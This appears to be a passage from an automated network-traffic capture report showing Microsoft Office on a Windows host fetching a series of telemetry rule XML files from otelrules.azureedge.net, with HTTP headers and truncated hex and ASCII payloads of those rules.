2024-11-04 16:31:32 UTC	415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 47 67 5d 5b 4c 6c 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru

Session ID	Source IP	Source Port	Destination IP	Destination Port
55	192.168.2.5	49772	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:33 UTC	192	OUT	GET /rules/rule120652v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:33 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:33 GMT Content-Type: text/xml Content-Length: 471 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT ETag: "0x8DC582B97E6FCDD" x-ms-request-id: d322b4d6-001e-0082-4b4d-2e5880000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163133Z-15869dbbcc6tfpj2hC1DFWvt5g00000003v000000000891k x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:33 UTC	471	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
56	192.168.2.5	49773	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:33 UTC	192	OUT	GET /rules/rule120653v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:33 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:33 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT ETag: "0x8DC582B9C710B28" x-ms-request-id: d07841a0-401e-0064-490f-2d54af000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163133Z-16547b76f7f76p6chC1DFWctqw000000040g00000000byv6 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:33 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
57	192.168.2.5	49774	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:33 UTC	192	OUT	GET /rules/rule120654v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:33 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:33 GMT Content-Type: text/xml Content-Length: 477 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT ETag: "0x8DC582BA54DCC28" x-ms-request-id: 6a353223-401e-0078-6e58-2e4d34000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163133Z-r159446fcd79csp5hC1DFW5w2s00000004wg00000000d0u0 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:33 UTC	477	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
58	192.168.2.5	49775	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:34 UTC	192	OUT	GET /rules/rule120655v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:34 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:34 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT ETag: "0x8DC582BB7F164C3" x-ms-request-id: 27754a15-d01e-007a-0f5f-2ef38c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163134Z-r159446fcd7t7gwchC1DFWyh4000000004m0000000007bxt x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:34 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 49 69 5d 5b 4d 6d 5d 5b 42 62 5d 5b 4f 6f 5d 5b 58 78 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
59	192.168.2.5	49776	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:34 UTC	192	OUT	GET /rules/rule120656v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:34 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:34 GMT Content-Type: text/xml Content-Length: 477 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT ETag: "0x8DC582BA48B5BDD" x-ms-request-id: 6538f966-101e-00a2-58f1-2c9f2e000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163134Z-16547b76f7ftdm8dhC1DFWs13g00000003z00000000000bx x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:34 UTC	477	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
60	192.168.2.5	49777	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:34 UTC	192	OUT	GET /rules/rule120657v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:34 UTC	491	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:34 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT ETag: "0x8DC582B9FF95F80" x-ms-request-id: 29e284b5-001e-0065-5703-2d0b73000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163134Z-16547b76f7fnm7lfhC1DFWkxt400000003tg00000000f51y x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:34 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 55 75 5d 5b 54 74 5d 5b 41 61 5d 5b 4e 6e 5d 5b 49 69 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
61	192.168.2.5	49778	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:35 UTC	192	OUT	GET /rules/rule120658v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:35 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:35 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT ETag: "0x8DC582BB650C2EC" x-ms-request-id: 57b0571f-501e-00a3-7dfb-2cc0f2000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163135Z-16547b76f7f7rtshhC1DFWrtqn00000003yg00000000aa79 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:35 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
62	192.168.2.5	49779	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:35 UTC	192	OUT	GET /rules/rule120659v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:35 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:35 GMT Content-Type: text/xml Content-Length: 468 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT ETag: "0x8DC582BB3EAF226" x-ms-request-id: 3e16ca6e-701e-0098-184d-2e395f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163135Z-15869dbbcc6lxrkghC1DFWp3wc00000003vg000000008shn x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:35 UTC	468	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 50 70 5d 5b 45 65 5d 5b 4e 6e 5d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 43 63 5d 5b 4b 6b 5d 20 5b 46 66 5d 5b 4f 6f 5d 5b 55 75 5d 5b 4e 6e 5d 5b 44 64 5d 5b 41 61 5d 5b 54 74 5d 5b 49 69 5d 5b 4f 6f 5d 5b 4e 6e 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I

Session ID	Source IP	Source Port	Destination IP	Destination Port
63	192.168.2.5	49780	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:35 UTC	192	OUT	GET /rules/rule120660v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:35 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:35 GMT Content-Type: text/xml Content-Length: 485 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:39 GMT ETag: "0x8DC582BB9769355" x-ms-request-id: 4c090a89-b01e-0098-3360-2ecead000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163135Z-15869dbbcc6xcpf8hC1DFWxtx000000003s0000000006z3p x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:35 UTC	485	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120660" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
64	192.168.2.5	49781	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:35 UTC	192	OUT	GET /rules/rule120661v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:36 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:36 GMT Content-Type: text/xml Content-Length: 411 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B989AF051" x-ms-request-id: 1572e0e4-b01e-003e-1a0c-2d8e41000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163136Z-16547b76f7f7jnp2hC1DFWfc3000000003yg00000000bphs x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:36 UTC	411	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 56 76 5d 5b 49 69 5d 5b 52 72 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120661" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <SR T="2" R="([Oo][Vv][Ii][Rr][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
65	192.168.2.5	49782	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:36 UTC	192	OUT	GET /rules/rule120662v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:36 UTC	491	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:36 GMT Content-Type: text/xml Content-Length: 470 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT ETag: "0x8DC582BBB181F65" x-ms-request-id: d34c4658-001e-0082-715c-2e5880000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163136Z-r159446fcd786fxnhC1DFWh5ac00000004p000000000fys8 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:36 UTC	470	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120662" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
66	192.168.2.5	49783	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:36 UTC	192	OUT	GET /rules/rule120663v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
